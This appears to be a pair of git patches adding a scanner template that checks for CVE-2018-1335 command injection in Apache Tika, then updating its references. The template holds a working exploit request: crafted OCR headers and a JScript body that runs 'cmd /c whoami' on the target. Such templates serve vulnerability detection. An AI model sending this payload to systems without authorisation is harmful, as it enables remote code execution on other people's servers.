From 0bdb8d0d32d80d5925bc272abd0dbfe0cfcd5863 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Sat, 27 Feb 2021 03:18:29 +0000
Subject: [PATCH 1/2] Create CVE-2018-1335.yaml

---
 cves/2018/CVE-2018-1335.yaml | 39 ++++++++++++++++++++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 cves/2018/CVE-2018-1335.yaml

diff --git a/cves/2018/CVE-2018-1335.yaml b/cves/2018/CVE-2018-1335.yaml
new file mode 100644
index 0000000000..0eabe5183d
--- /dev/null
+++ b/cves/2018/CVE-2018-1335.yaml
@@ -0,0 +1,39 @@
+id: CVE-2018-1335
+
+info:
+  name: Apache Tika 1.15-1.17 Header Command Injection
+  author: pikpikcu
+  severity: critical
+  reference: https://www.exploit-db.com/exploits/47208
+  tags: cve,cve2018,apache,tika,rce
+
+requests:
+  - method: PUT
+    path:
+      - "{{BaseURL}}/meta"
+    headers:
+      X-Tika-OCRTesseractPath: cscript
+      X-Tika-OCRLanguage: //E:Jscript
+      Expect: 100-continue
+      Content-type: image/jp2
+      Connection: close
+    body: "var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Content-Type: text/csv"
+        part: header
+
+      - type: word
+        words:
+          - "org.apache.tika.parser.DefaultParser"
+          - "org.apache.tika.parser.gdal.GDALParse"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200

From c59c99a92edf5f19236f50177810f3b23e6fe07e Mon Sep 17 00:00:00 2001
From: sandeep <8293321+bauthard@users.noreply.github.com>
Date: Sat, 27 Feb 2021 17:17:45 +0530
Subject: [PATCH 2/2] Update CVE-2018-1335.yaml

---
 cves/2018/CVE-2018-1335.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/cves/2018/CVE-2018-1335.yaml b/cves/2018/CVE-2018-1335.yaml
index 0eabe5183d..74fea232e7 100644
--- a/cves/2018/CVE-2018-1335.yaml
+++ b/cves/2018/CVE-2018-1335.yaml
@@ -4,7 +4,8 @@ info:
   name: Apache Tika 1.15-1.17 Header Command Injection
   author: pikpikcu
   severity: critical
-  reference: https://www.exploit-db.com/exploits/47208
+  reference: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/
+  edb: https://www.exploit-db.com/exploits/47208
   tags: cve,cve2018,apache,tika,rce
 
 requests: